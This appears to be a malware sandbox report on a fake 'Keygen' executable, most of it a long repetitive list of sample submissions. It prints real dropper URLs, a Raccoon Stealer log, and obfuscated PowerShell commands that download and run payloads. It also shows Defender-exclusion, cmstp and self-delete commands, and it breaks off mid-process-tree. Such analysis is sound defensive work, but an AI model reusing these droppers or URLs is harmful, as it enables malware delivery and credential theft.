Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    152s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (123) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.01 - 23:20:56 GMT Bot_ID: 992575D9-3ACE-4400-98F7-F39D82F3369F_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: ELJKIHEZ - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (458 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 2 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 52 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (123) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (123) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:732
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\5908.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (123) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1864
      • C:\Users\Admin\AppData\Local\Temp\5908.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1896
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5908.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1952
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1676
          • C:\Users\Public\dyl.exe
            "C:\Users\Public\dyl.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2452
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2656
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2908
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2908 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\829440364718243\\* & exit
                  8⤵
                    PID:2732
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2908
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2616
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2696
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2948
              • C:\Users\Public\dyl.exe
                "C:\Users\Public\dyl.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2800
                • C:\Users\Admin\AppData\Local\Temp\apGqLZMKec.exe
                  "C:\Users\Admin\AppData\Local\Temp\apGqLZMKec.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2212
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\apGqLZMKec.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2684
                • C:\Users\Admin\AppData\Local\Temp\AoXP2SNZVU.exe
                  "C:\Users\Admin\AppData\Local\Temp\AoXP2SNZVU.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:2572
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:1544
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Public\Natso.bat
                        9⤵
                          PID:2452
                      • C:\Program Files (x86)\internet explorer\ieinstal.exe
                        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                        8⤵
                          PID:2352
                      • C:\Users\Admin\AppData\Local\Temp\vFJcvO6UTg.exe
                        "C:\Users\Admin\AppData\Local\Temp\vFJcvO6UTg.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:2568
                        • \??\c:\windows\SysWOW64\cmstp.exe
                          "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\gfw3mjw4.inf
                          8⤵
                            PID:2300
                        • C:\Users\Admin\AppData\Local\Temp\bmikSAVIZu.exe
                          "C:\Users\Admin\AppData\Local\Temp\bmikSAVIZu.exe"
                          7⤵
                          • Executes dropped EXE
                          • Windows security modification
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2492
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "powershell" Get-MpPreference -verbose
                            8⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1028
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\dyl.exe"
                          7⤵
                            PID:1676
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /T 10 /NOBREAK
                              8⤵
                              • Delays execution with timeout.exe
                              PID:1460
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5908.tmp\m1.hta"
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:1148
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1992
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 1
                    3⤵
                    • Delays execution with timeout.exe
                    PID:1968
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\5908.tmp\b.hta"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1576
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
